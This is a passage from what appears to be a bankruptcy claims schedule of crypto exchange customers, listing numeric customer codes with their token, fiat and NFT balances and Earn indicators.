| 07346782 | | AAVE[0.02002251], BAT[5.73629037], BCH[0], BRZ[0], BTC[0.00043511], CUSDT[50.54275152], DOGE[221.74579941], ETH[0.00726076], ETHW[0.00716493], GRT[0], KSHIB[88.12349132], LTC[0.01262290], MKR[.00018417], SHIB[432353.60048892], SOL[0.08282154], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07346783 | | GRT[5.76796464], USD[0.00] | Yes | |
| 07346784 | | USD[10.00] | | |
| 07346785 | | USD[10.00] | | |
| 07346786 | | BRZ[4], CUSDT[3], DOGE[37722.19447808], LTC[0], TRX[3], USD[0.00] | | |
| 07346787 | | USD[10.00] | | |
| 07346788 | | CUSDT[.00008673], DOGE[.00001184], TRX[2.00006034], USD[0.04] | | |
| 07346789 | | BAT[1], BCH[.00007088], CUSDT[2], DOGE[500.80251098], TRX[3], USD[0.00] | | |
| 07346790 | | USD[10.00] | | |
| 07346791 | | BAT[.02890616], DOGE[1.0115039], GRT[.02903034], LINK[.01924387], PAXG[.00004298], SUSHI[.00344739], USD[0.01] | | |
| 07346792 | | TRX[1], USD[0.00] | | |
| 07346794 | | USD[0.00] | | |
| 07346796 | | USD[10.00] | | |
| 07346797 | | BRZ[2], BTC[.00020846], CUSDT[3], TRX[1], USD[0.00] | | |
| 07346798 | | AUD[2.59], BAT[19.55849441], BCH[.00736018], BTC[.00023184], CAD[2.51], DAI[3.96376453], DOGE[1.00002001], ETH[.00451137], ETHW[.00451137], EUR[2.46], GBP[1.44], GRT[9.35117214], LINK[1.0047938], SOL[1.03165094], SUSHI[3.23775318], TRX[183.59216745], UNI[1.00071017], USD[0.57], USDT[4.97104312] | | |
| 07346799 | | BAT[1], BRZ[2], CUSDT[3], DOGE[1], GRT[1], TRX[3], USD[0.00] | | |
| 07346800 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07346801 | | DOGE[560.88080000], ETH[0.12652957], ETHW[0.12652957], USD[0.02] | | |
| 07346802 | | BRZ[2], CUSDT[12.88797485], DOGE[427.42870785], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07346803 | | USD[10.00] | | |
| 07346804 | | USD[10.00] | | |
| 07346805 | | USD[10.00] | | |
| 07346807 | | DOGE[3], USD[0.00] | | |
| 07346808 | | CUSDT[7], GRT[1], TRX[8], USD[0.01] | | |
| 07346809 | | SUSHI[.69509404], USD[0.00] | | |
| 07346810 | | BCH[.00000034], BRZ[62.41921753], BTC[0.00075751], CUSDT[5], DAI[0.57943910], DOGE[73.89549543], GRT[8.76753551], SOL[0.00001662], SUSHI[.04343096], TRX[250.65547627], UNI[1.14668447], USD[0.12] | Yes | |
| 07346811 | | CUSDT[5], TRX[5], USD[0.01] | | |
| 07346812 | | SOL[0], USD[0.00] | | |
| 07346813 | | DOGE[19.34285376], TRX[2], USD[1.00], USDT[0] | | |
| 07346814 | | DOGE[14575.66444437], USD[0.00] | | |
| 07346815 | | BF_POINT[200], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], USD[0.00] | Yes | |
| 07346816 | | AUD[0.00], BAT[49.28027059], BRZ[2], BTC[0.05390788], CAD[0.00], CUSDT[519.65213987], DOGE[300.69102786], GRT[53.16537569], MATIC[15.68711462], SHIB[4965817.78438247], SUSHI[36.30378404], TRX[490.80357070], USD[0.00], USDT[21.07132454] | Yes | |
| 07346817 | | USD[0.03] | | |
| 07346818 | | ETHW[.00010991], SHIB[11.64471891], USD[0.55] | Yes | |
| 07346819 | | BRZ[0.00000067], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000156] | | |
| 07346820 | | USD[10.00] | | |
| 07346821 | | CUSDT[3], MATIC[17.46767982], USD[0.00] | Yes | |
| 07346822 | | USD[10.00] | | |
| 07346823 | | CUSDT[2], DOGE[7969.73379194], USD[11.02] | Yes | |
| 07346825 | | USD[10.00] | | |
| 07346826 | | USD[10.00] | | |
| 07346827 | | BRZ[1], CUSDT[1], DOGE[160.06163749], TRX[1], USD[0.00] | | |
| 07346828 | | DOGE[39.78782584], USD[0.00] | | |
| 07346829 | | USD[10.00] | | |
| 07346830 | | BRZ[7], CUSDT[28], TRX[6], USD[0.00] | | |
| 07346831 | | USD[0.00] | | |
| 07346832 | | DOGE[1], ETH[.00170873], ETHW[.00170873], USD[0.00] | | |
| 07346833 | | USD[10.00] | | |
| 07346834 | | BRZ[3], BTC[.00880926], CUSDT[38], DOGE[5965.15878259], ETH[.39478371], ETHW[0.39461440], LINK[9.19309772], LTC[5.14903487], MATIC[535.87599441], SHIB[3186125.66918508], SOL[8.62862266], TRX[111], USD[0.00], USDT[220.04492550] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346835 | | BRZ[1], CUSDT[22], DOGE[43.36336804], ETH[.01546527], ETHW[.01546527], LINK[1.0148926], MATIC[7.62713261], SHIB[68549.49273375], SUSHI[2.06049876], USD[66.07] | | |
| 07346836 | | USD[10.00] | | |
| 07346838 | | BTC[0], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | | |
| 07346839 | | BRZ[0], DOGE[3], TRX[5285.55278134], USD[0.00], USDT[0] | Yes | |
| 07346840 | | BRZ[4], BTC[.00295698], CUSDT[6], DOGE[3288.22987821], KSHIB[918.54625725], SHIB[7581314.95407932], TRX[2888.51165784], USD[0.02] | Yes | |
| 07346841 | | CUSDT[1], DOGE[6291.69473567], ETH[.19099768], ETHW[.19099768], TRX[2], USD[10.00] | | |
| 07346842 | | USD[0.00] | | |
| 07346843 | | BTC[0], TRX[0], USD[0.82], USDT[0] | | |
| 07346844 | | USD[10.00] | | |
| 07346845 | | USD[10.00] | | |
| 07346846 | | DOGE[1], USD[0.00] | | |
| 07346847 | | BRZ[28.05936913], KSHIB[301.71136721], TRX[64.57148554], USD[0.29] | | |
| 07346848 | | USD[10.00] | | |
| 07346849 | | USD[10.00] | | |
| 07346850 | | DOGE[3], TRX[.000017], USD[0.00] | | |
| 07346851 | | USD[10.00] | | |
| 07346852 | | BTC[.00001134], CUSDT[6], DOGE[3.01861323], TRX[2], USD[0.93] | Yes | |
| 07346853 | | USD[10.00] | | |
| 07346854 | | USD[0.00] | | |
| 07346855 | | BRZ[1], DOGE[6863.93517443], TRX[69.94659787], USD[0.00] | | |
| 07346856 | | USD[10.00] | | |
| 07346857 | | USD[10.00] | | |
| 07346858 | | CUSDT[2], DOGE[731.62068618], LINK[6.09607043], TRX[2], USD[407.55] | | |
| 07346859 | | DOGE[1.60800371], USD[0.00] | | |
| 07346860 | | BAT[19.27800776], NFT (518742719104563502/Coachella x FTX Weekend 1 #944)[1], USD[0.00] | | |
| 07346861 | | USD[10.00] | | |
| 07346862 | | TRX[1], USD[0.00] | | |
| 07346863 | | DOGE[1952.93544611], USD[0.00] | | |
| 07346864 | | BTC[.00018376], USD[0.00] | | |
| 07346865 | | DOGE[0], GRT[1], MATIC[0.00002191], SOL[0], TRX[1], USD[0.01], USDT[0.00000002] | Yes | |
| 07346866 | | BAT[1], BRZ[0.00000027], DOGE[1], GRT[.25243065], SUSHI[0], TRX[4], USD[0.00] | | |
| 07346867 | | CUSDT[6], DOGE[.98734624], SHIB[477780.77026663], TRX[3], USD[0.00] | | |
| 07346868 | | USD[10.00] | | |
| 07346869 | | CUSDT[10], DOGE[1260.25331357], SHIB[2937533.85176164], USD[-15.00] | | |
| 07346870 | | DOGE[1], ETH[.03441941], ETHW[.03441941], USD[0.00] | | |
| 07346871 | | USD[10.00] | | |
| 07346872 | | BRZ[4], CUSDT[3], ETH[.00867811], KSHIB[.00005638], LINK[4.70491525], SHIB[2.94362], TRX[17056.62336754], USD[0.01] | | |
| 07346873 | | USD[10.00] | | |
| 07346875 | | USD[10.00] | | |
| 07346876 | | DOGE[1], USD[0.00], YFI[0] | | |
| 07346877 | | CUSDT[1], DOGE[1638.82848828], GRT[1], USD[0.00] | | |
| 07346878 | | USD[0.01] | | |
| 07346879 | | BCH[0], BTC[0], DOGE[3], ETH[.00815397], ETHW[0], TRX[4], USD[0.00], USDT[0] | | |
| 07346880 | | BAT[42.55252238], DOGE[323.79577361], GRT[1.74200956], SOL[.26375528], TRX[78.17371199], USD[0.00], USDT[0] | | |
| 07346881 | | USD[10.00] | | |
| 07346882 | | USD[10.00] | | |
| 07346885 | | CUSDT[1], DOGE[2], ETH[.07282324], ETHW[.07282324], USD[10.00] | | |
| 07346887 | | BAT[179.02620567], CUSDT[2592.90761554], DOGE[7580.79019183], LINK[2.42948627], SOL[13.08504484], SUSHI[5.30686177], TRX[735.90452281], UNI[1.49183323], USD[0.00] | Yes | |
| 07346888 | | BAT[2.09535354], CUSDT[11], TRX[1], USD[0.00], USDT[1.10540245] | Yes | |
| 07346889 | | BRZ[1], CUSDT[4], TRX[2], USD[0.00] | | |
| 07346890 | | CUSDT[1], DOGE[1.52837219], USD[0.00] | | |
| 07346891 | | BRZ[1], ETH[.02768574], ETHW[.02768574], TRX[3], USD[0.00] | | |
| 07346892 | | BRZ[1], DOGE[2.51058826], USD[10.00] | | |
| 07346893 | | USD[10.00] | | |
| 07346894 | | CUSDT[1], DOGE[34.67023402], ETH[0], UNI[0], USD[0.00], USDT[0] | | |
| 07346895 | | CUSDT[6], USD[0.00] | | |
| 07346896 | | USD[10.00] | | |
| 07346897 | | BAT[1.01655549], BTC[.00004726], CUSDT[27.7777115], DOGE[1], NFT (557773860769719489/Halloween edition #4)[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346898 | | BAT[1], BF_POINT[200], BRZ[2], CUSDT[6], DOGE[2356.94287808], SOL[4.4610562], TRX[1], USD[0.00], USDT[1] | | |
| 07346899 | | DOGE[1.02929799], USD[0.00] | | |
| 07346900 | | USD[10.00] | | |
| 07346901 | | BRZ[3], CUSDT[1], DOGE[2], TRX[3], UNI[67.2311427], USD[0.00], USDT[1] | | |
| 07346904 | | CUSDT[2], DOGE[.00540789], TRX[263.51424176], USD[0.00] | Yes | |
| 07346905 | | USD[10.00] | | |
| 07346907 | | SUSHI[.61139295], USD[0.00] | | |
| 07346908 | | CUSDT[131.11330691], DOGE[1627.93152633], SHIB[221512.69962982], TRX[168.20788231], USD[5.65] | Yes | |
| 07346909 | | BCH[0], BTC[0], DOGE[1], ETH[.00002916], ETHW[.00002916], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07346910 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07346911 | | USD[10.00] | | |
| 07346912 | | USD[10.00] | | |
| 07346913 | | USD[10.00] | | |
| 07346914 | | DOGE[32.82432219], USD[0.00] | | |
| 07346915 | | USD[10.00] | | |
| 07346916 | | DOGE[42.55682602], USD[0.00] | | |
| 07346917 | | BRZ[1], DOGE[1], TRX[1], USD[20.00] | | |
| 07346919 | | USD[10.00] | | |
| 07346920 | | USD[0.00] | Yes | |
| 07346921 | | DOGE[2925.18834317], SHIB[3607831.76391007], USD[0.00] | Yes | |
| 07346922 | | USD[10.00] | | |
| 07346923 | | CUSDT[3], DOGE[7047.43547993], GRT[24.70820658], TRX[1], USD[0.02] | | |
| 07346924 | | BRZ[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07346925 | | DOGE[0], SHIB[506.57372039], SOL[.15610602], TRX[1], USD[0.00] | | |
| 07346926 | | DOGE[119.1990728], GRT[.00002743], USD[0.00] | | |
| 07346927 | | BAT[8.02214374], USD[0.00] | | |
| 07346928 | | BTC[0], CUSDT[3], DOGE[1], ETH[0], TRX[1561.6788015], USD[0.09] | | |
| 07346929 | | USD[10.00] | | |
| 07346930 | | BAT[1.17505327], CUSDT[10], DOGE[2.71351459], ETH[.0003249], ETHW[.0003249], MATIC[0], SHIB[85735.06435300], TRX[5.4127989], USD[0.58] | Yes | |
| 07346931 | | DOGE[1938.21589215], USD[0.00] | | |
| 07346932 | | USD[10.00] | | |
| 07346933 | | CUSDT[1], USD[0.00] | | |
| 07346934 | | USD[60.00] | | |
| 07346935 | | BRZ[1], CUSDT[3], DOGE[0], ETH[0], GRT[0], SUSHI[0], TRX[4], USD[0.00], USDT[2] | | |
| 07346936 | | USD[10.00] | | |
| 07346937 | | BRZ[4], BTC[.00316634], CUSDT[22], DOGE[1943.10336152], ETH[.00003491], ETHW[.00003491], SHIB[3389929.67490028], SOL[.0353131], TRX[6], USD[0.30], USDT[1.08623882] | Yes | |
| 07346938 | | USD[10.00] | | |
| 07346939 | | CUSDT[10.54073664], DOGE[1.00003776], GRT[.00003063], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07346940 | | CUSDT[1], DOGE[152.2373563], USD[0.00] | | |
| 07346941 | | USD[10.00] | | |
| 07346943 | | USD[10.00] | | |
| 07346944 | | BRZ[1], CUSDT[2], USD[0.01] | | |
| 07346945 | | USD[10.00] | | |
| 07346946 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07346947 | | BTC[0], DOGE[0], LINK[0], LTC[0], TRX[0], USD[0.00] | | |
| 07346948 | | DOGE[187.69552615], USD[0.00] | | |
| 07346949 | | USD[10.00] | | |
| 07346950 | | USD[10.00] | | |
| 07346951 | | DOGE[16.36335047], USD[0.00], USDT[0] | | |
| 07346953 | | USD[10.00] | | |
| 07346954 | | SHIB[5023.16985992], USD[0.00] | Yes | |
| 07346955 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07346956 | | USD[10.00] | | |
| 07346957 | | BTC[.0001056], DOGE[1.00005015], USD[0.00] | | |
| 07346959 | | USD[10.00] | | |
| 07346960 | | USD[10.00] | | |
| 07346962 | | ETH[0], TRX[1], USD[0.00] | Yes | |
| 07346963 | | AVAX[0], BTC[0], CUSDT[1], DOGE[1], GRT[0], SHIB[2], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346965 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07346966 | | BRZ[149.75011824], CUSDT[2497.73687644], DOGE[43.53934861], KSHIB[238.89127467], MATIC[16.11355286], NFT (371123438195949673/NS Dino 2)[1], NFT (384883704625297769/Pop Art #3)[1], NFT (490286290425619260/Tiger Dino)[1], NFT (535623208074015768/NS Dino 1)[1], NFT (547713245555291410/Mad Lions Series #13)[1], NFT (555704936866033341/CryptoAvatar #93)[1], NFT (575692264691004333/Ravager #1607)[1], SOL[.67161071], TRX[1], USD[8.19] | Yes | |
| 07346967 | | CUSDT[4], GRT[1], TRX[4], USD[0.00], USDT[1] | | |
| 07346968 | | DOGE[695.92756527], ETH[.00564864], ETHW[.00564864], LTC[.03882345], USD[0.00] | | |
| 07346969 | | USD[10.00] | | |
| 07346970 | | USD[10.00] | | |
| 07346971 | | USD[10.00] | | |
| 07346972 | | USD[10.00] | | |
| 07346973 | | USD[10.00] | | |
| 07346974 | | SOL[1.37294984], USD[0.00] | Yes | |
| 07346975 | | CUSDT[1], DOGE[1745.03989859], USD[-50.00] | | |
| 07346976 | | USD[10.00] | | |
| 07346977 | | USD[10.00] | | |
| 07346978 | | DOGE[36.46543722], TRX[1], USD[0.00] | Yes | |
| 07346979 | | USD[0.00] | | |
| 07346980 | | USD[10.00] | | |
| 07346981 | | CUSDT[3], ETH[0], ETHW[0], USD[0.00] | | |
| 07346982 | | USD[10.00] | | |
| 07346983 | | BAT[1.0165555], BRZ[1], CUSDT[2497.01348246], DOGE[6303.04341569], TRX[1], USD[0.00] | Yes | |
| 07346984 | | USD[0.00] | Yes | |
| 07346985 | | USD[10.00] | | |
| 07346986 | | DOGE[.01305704], USD[0.00] | | |
| 07346987 | | USD[10.00] | | |
| 07346988 | | USD[223.52] | | |
| 07346989 | | USD[10.00] | | |
| 07346990 | | USD[0.01] | | |
| 07346991 | | CUSDT[1], DOGE[2], SUSHI[8.55563626], USD[0.06] | | |
| 07346992 | | BAT[1], BRZ[1], CUSDT[3], DOGE[5], GRT[1], SOL[10.77572986], TRX[9079.27460854], USD[0.01], USDT[2] | | |
| 07346993 | | USD[10.00] | | |
| 07346994 | | USD[10.00] | | |
| 07346995 | | USD[10.00] | | |
| 07346996 | | DOGE[20.21527284], USD[0.00] | | |
| 07346997 | | CUSDT[1], SOL[0.16361732], USD[0.00] | Yes | |
| 07346998 | | AAVE[0], ALGO[0], DOGE[0], ETH[0.00000001], ETHW[0], LTC[0], NFT (355638467472334276/Barcelona Ticket Stub #2285)[1], NFT (369839472193420385/Humpty Dumpty #199)[1], NFT (451723472841958276/Entrance Voucher #2560)[1], NFT (512908815421775198/FTX Crypto Cup 2022 Key #2150)[1], NFT (539048298612915535/The Hill by FTX #1458)[1], NFT (545424967226514486/Australia Ticket Stub #966)[1], NFT (568158619000490429/2974 Floyd Norman - OKC 5-0210)[1], SOL[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07346999 | | USD[10.00] | | |
| 07347000 | | DOGE[131.56084044], USD[0.00] | | |
| 07347001 | | DOGE[1], USD[0.01] | | |
| 07347002 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07347003 | | USD[1334.89], USDT[0] | Yes | |
| 07347005 | | BTC[0], DOGE[0], ETH[0], LINK[0], USD[0.00] | | |
| 07347007 | | DOGE[1], USD[0.00] | | |
| 07347008 | | BRZ[1], BTC[0], CUSDT[2], DOGE[33.46910039], TRX[1], USD[0.00] | Yes | |
| 07347009 | | CUSDT[2], DOGE[727.40058772], TRX[3], USD[0.00] | Yes | |
| 07347010 | | TRX[2], USD[0.00] | | |
| 07347011 | | DOGE[135.24515889], TRX[1], USD[0.00] | | |
| 07347012 | | CUSDT[2], DOGE[1.00006074], SUSHI[.0039801], TRX[1], USD[0.01] | | |
| 07347013 | | BAT[1], BRZ[6], CUSDT[91], GRT[1], TRX[11], USD[0.00] | | |
| 07347014 | | USD[10.00] | | |
| 07347015 | | USD[10.00] | | |
| 07347016 | | AVAX[10.26319488], BAT[1825.90889179], BCH[7.62417886], BF_POINT[100], BRZ[2], BTC[.20258545], CUSDT[7], DOGE[12716.41480246], ETH[0.13103151], ETHW[0.12998340], GRT[107.25439227], LINK[104.64497000], LTC[21.29283026], SHIB[104500586.23925088], SOL[5.03551567], TRX[4], USD[4.58] | Yes | |
| 07347017 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07347018 | | CUSDT[1], USD[0.00] | | |
| 07347019 | | DOGE[.00005905], TRX[1], USD[0.02] | | |
| 07347020 | | USD[10.00] | | |
| 07347021 | | DOGE[1], USD[0.01] | Yes | |
| 07347022 | | TRX[1], USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347023 | | CUSDT[2], USD[0.01] | Yes | |
| 07347024 | | USD[10.00] | | |
| 07347025 | | USD[10.00] | | |
| 07347026 | | CUSDT[7], DOGE[47.42072118], SHIB[12.39709105], USD[0.00] | Yes | |
| 07347027 | | USD[10.00] | | |
| 07347028 | | USD[10.00] | | |
| 07347029 | | USD[10.00] | | |
| 07347030 | | BAT[82.34630567], BTC[.00170995], CUSDT[2], DOGE[941.2363301], ETH[.00250358], ETHW[.00250358], GRT[1.09805696], SUSHI[.07310578], TRX[4.93199133], UNI[0.47475463], USD[196.40] | | |
| 07347031 | | USD[10.00] | | |
| 07347032 | | BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], USD[0.00] | | |
| 07347033 | | USD[10.00] | | |
| 07347034 | | BRZ[1], CUSDT[1], DOGE[2000.40129623], SHIB[3876779.49702128], TRX[1], USD[0.00], USDT[0] | | |
| 07347035 | | USD[10.00] | | |
| 07347036 | | USD[10.00] | | |
| 07347037 | | USD[10.00] | | |
| 07347038 | | DOGE[2.0523203], USD[0.00], USDT[0] | | |
| 07347039 | | CUSDT[5], DOGE[24.47809941], TRX[1], USD[0.00] | | |
| 07347040 | | USD[0.00] | | |
| 07347041 | | BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07347043 | | BRZ[1], CUSDT[2], TRX[7], USD[0.00], USDT[1] | | |
| 07347044 | | USD[10.00] | | |
| 07347045 | | BAT[23.43075824], DOGE[0], USD[0.69], USDT[0] | | |
| 07347046 | | CUSDT[4], DOGE[9416.08535248], USD[0.00] | | |
| 07347047 | | USD[10.00] | | |
| 07347049 | | USD[10.00] | | |
| 07347053 | | USD[10.00] | | |
| 07347054 | | CUSDT[2], DOGE[1407.17665598], USD[0.87] | | |
| 07347055 | | CUSDT[7], TRX[0], USD[0.03] | Yes | |
| 07347056 | | USD[20.00] | | |
| 07347058 | | USD[0.01], USDT[0.00000001] | | |
| 07347059 | | BF_POINT[100], CUSDT[2], DOGE[2212.788414], USD[0.01], USDT[0.00045439] | Yes | |
| 07347060 | | BAT[1], BRZ[6], CUSDT[6], TRX[7], USD[0.01], USDT[1] | | |
| 07347061 | | BAT[3, CUSDT[6], DOGE[126585.51441489], GRT[1], SHIB[125608.56754306], TRX[1], USD[0.00], USDT[2] | | |
| 07347062 | | USD[0.00] | | |
| 07347063 | | BAT[1.0165555], BRZ[4], CUSDT[28], DOGE[5992.34993366], GRT[2.08594097], TRX[2452.60564232], USD[2.53], USDT[2.22078119] | Yes | |
| 07347064 | | USD[10.00] | | |
| 07347065 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], SHIB[2], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07347066 | | CUSDT[1], DOGE[18.64666368], USD[0.00] | | |
| 07347067 | | BRZ[2], CUSDT[5], DOGE[3], SHIB[3], USD[0.00], USDT[0] | | |
| 07347068 | | BCH[.50944358], BTC[0], DOGE[6.71409598], LINK[0], TRX[1], USD[50.82], USDT[0.00012234] | | |
| 07347069 | | USD[10.00] | | |
| 07347070 | | BF_POINT[200], BTC[.05595527], DOGE[10488.15711912], ETH[.75672735], ETHW[1.01251703], SHIB[5720095.23676485], SOL[42.42101364], TRX[8], USD[216.61], USDT[0] | Yes | |
| 07347071 | | USD[10.00] | | |
| 07347072 | | USD[0.77], USDT[0.00002076] | | |
| 07347074 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07347075 | | BTC[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07347076 | | USD[10.00] | | |
| 07347077 | | SOL[.36029166], USD[0.00], USDT[0] | Yes | |
| 07347079 | | USD[10.00] | | |
| 07347080 | | BRZ[2], CUSDT[5], DOGE[47671.16668091], GRT[1.0045736], MATIC[244.40719138], SHIB[1600629.39796975], SOL[1.09967865], TRX[1432.35585905], USD[0.00] | Yes | |
| 07347081 | | USD[10.00] | | |
| 07347082 | | USD[10.00] | | |
| 07347083 | | BAT[1], BRZ[1], CUSDT[5], DOGE[127.00001211], GRT[2], TRX[3], USD[0.00], USDT[2] | | |
| 07347084 | | BAT[765.73717343], BTC[.04062455], SHIB[23199302.5294964], USD[0.00] | Yes | |
| 07347085 | | BTC[.00225792], CUSDT[2], DOGE[.00001973], ETH[.00386988], ETHW[.00386988], TRX[1], USD[140.96] | | |
| 07347087 | | CUSDT[104.44207084], DOGE[0.27834997], TRX[1.63298892], USD[0.00], USDT[0] | | |
| 07347088 | | USD[10.00] | | |
| 07347089 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347090 | | DOGE[25.4244213], USD[0.00] | | |
| 07347091 | | BRZ[0], BTC[0], DOGE[0], ETH[.00000001], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07347092 | | GRT[9.91543266], USD[0.00] | | |
| 07347093 | | DOGE[172.46365888], USD[0.00] | | |
| 07347094 | | CUSDT[1], USD[0.00] | | |
| 07347096 | | CUSDT[0], DOGE[0], USD[0.00] | | |
| 07347097 | | USD[0.00] | Yes | |
| 07347099 | | USD[10.00] | | |
| 07347100 | | BRZ[0.00000159], BTC[0], CUSDT[2], DOGE[0], TRX[3], UNI[0.04438595], USD[0.00] | Yes | |
| 07347101 | | DOGE[5182.37936608], USD[10.00] | | |
| 07347102 | | BAT[1], CUSDT[2], DOGE[1.05266556], TRX[1], USD[0.00] | | |
| 07347103 | | BTC[0], DOGE[2027.99644768], SHIB[3995402.08409237], TRX[1], USD[0.00] | Yes | |
| 07347104 | | USD[10.00] | | |
| 07347105 | | USD[0.02], USDT[0] | | |
| 07347106 | | ETH[.00551779], ETHW[.00551779], USD[0.00] | | |
| 07347107 | | DOGE[4.70099978], ETH[.00010549], ETHW[.00010549], USD[0.01] | | |
| 07347108 | | USD[10.00] | | |
| 07347109 | | USD[10.00] | | |
| 07347110 | | DOGE[.0047606], USD[0.00] | | |
| 07347111 | | USD[10.00] | | |
| 07347112 | | USD[10.00] | | |
| 07347113 | | USD[10.00] | | |
| 07347114 | | USD[10.00] | | |
| 07347115 | | USD[0.05] | Yes | |
| 07347116 | | BRZ[3], CUSDT[2], DOGE[4.07397116], ETH[.00000001], ETHW[.00000001], GRT[1], SOL[.00001661], TRX[.00009591], USD[0.01] | | |
| 07347117 | | BRZ[4], CUSDT[2], TRX[3], USD[0.00], USDT[0] | | |
| 07347118 | | USD[10.00] | | |
| 07347119 | | BAT[1], DOGE[1], TRX[1], USD[2.24], USDT[0] | | |
| 07347120 | | USD[10.00] | | |
| 07347121 | | DOGE[3166.37790811], TRX[3], USD[0.00] | | |
| 07347122 | | USD[0.07] | | |
| 07347123 | | BTC[.00000003], USD[0.00] | | |
| 07347124 | | USD[0.00] | Yes | |
| 07347125 | | USD[10.00] | | |
| 07347126 | | BRZ[2], CUSDT[10], DOGE[0], SHIB[1], TRX[6], USD[0.00] | Yes | |
| 07347127 | | USD[0.00] | Yes | |
| 07347128 | | BAT[0], BRZ[0], BTC[0.00000008], CUSDT[2], DAI[0], DOGE[85.99065317], ETH[0.00000013], ETHW[0.00000013], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07347129 | | CUSDT[2], DOGE[13478.49781218], TRX[1], USD[0.00] | Yes | |
| 07347130 | | BTC[0], ETHW[.000719], USD[0.00], USDT[3.34725372] | | |
| 07347131 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07347132 | | USD[10.00] | | |
| 07347133 | | DOGE[.00006761], USD[0.01] | | |
| 07347134 | | CUSDT[1], DOGE[1.50309498], USD[0.43] | | |
| 07347135 | | CUSDT[2], DOGE[511.67655592], USD[0.00] | | |
| 07347136 | | BRZ[1], CUSDT[4], GRT[1], TRX[3], USD[0.01] | | |
| 07347137 | | BAT[0], BRZ[0.00000005], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07347138 | | USD[10.98] | Yes | |
| 07347139 | | CUSDT[1], DOGE[2.00001123], ETH[.90365326], ETHW[.90365326], SHIB[31225604.99609679], TRX[2], USD[0.00] | | |
| 07347140 | | CUSDT[2], DOGE[0.00001423], ETH[0], TRX[2], USD[0.00] | | |
| 07347141 | | USD[10.00] | | |
| 07347144 | | BTC[.00046517], CUSDT[2], DOGE[1], GRT[16.12901398], MATIC[4.19078164], PAXG[.00603737], SOL[.04824004], SUSHI[1.10423331], TRX[2.000001], USD[0.09], USDT[9.98570918] | Yes | |
| 07347145 | | USD[10.00] | | |
| 07347146 | | LINK[0], LTC[0], SOL[0], USD[0.00] | | |
| 07347147 | | DOGE[1], USD[0.00] | | |
| 07347148 | | USD[10.00] | | |
| 07347149 | | BRZ[2], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07347150 | | DOGE[1661.09104603], USD[10.00] | | |
| 07347151 | | USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347153 | | CUSDT[1], USD[0.00], USDT[1] | | |
| 07347154 | | USD[10.00] | | |
| 07347155 | | CUSDT[1], DOGE[2336.63524186], SHIB[1], USD[0.05] | Yes | |
| 07347156 | | CUSDT[2], DOGE[1.83467438], USD[0.00] | | |
| 07347157 | | USD[10.00] | | |
| 07347158 | | USD[10.00] | | |
| 07347159 | | USD[0.00] | | |
| 07347162 | | USD[10.00] | | |
| 07347163 | | USD[10.00] | | |
| 07347165 | | BAT[0], CUSDT[1], DOGE[0], GRT[0], USD[0.01] | | |
| 07347166 | | LINK[.33654098], USD[0.00] | | |
| 07347167 | | DOGE[845.84494016], USD[0.01] | | |
| 07347168 | | BAT[15.75044763], CUSDT[1], USD[0.00] | | |
| 07347169 | | DOGE[.26589609], USD[0.00] | | |
| 07347170 | | USD[10.00] | | |
| 07347171 | | BTC[0.00157048], DOGE[2], LTC[0.44478638], SGD[13.11], USD[0.00] | | |
| 07347173 | | USD[10.00] | | |
| 07347174 | | BRZ[2], CUSDT[6], SHIB[3], TRX[4], USD[0.00] | | |
| 07347175 | | CUSDT[1], DOGE[16744.47057522], LTC[3.69026458], USD[0.00] | | |
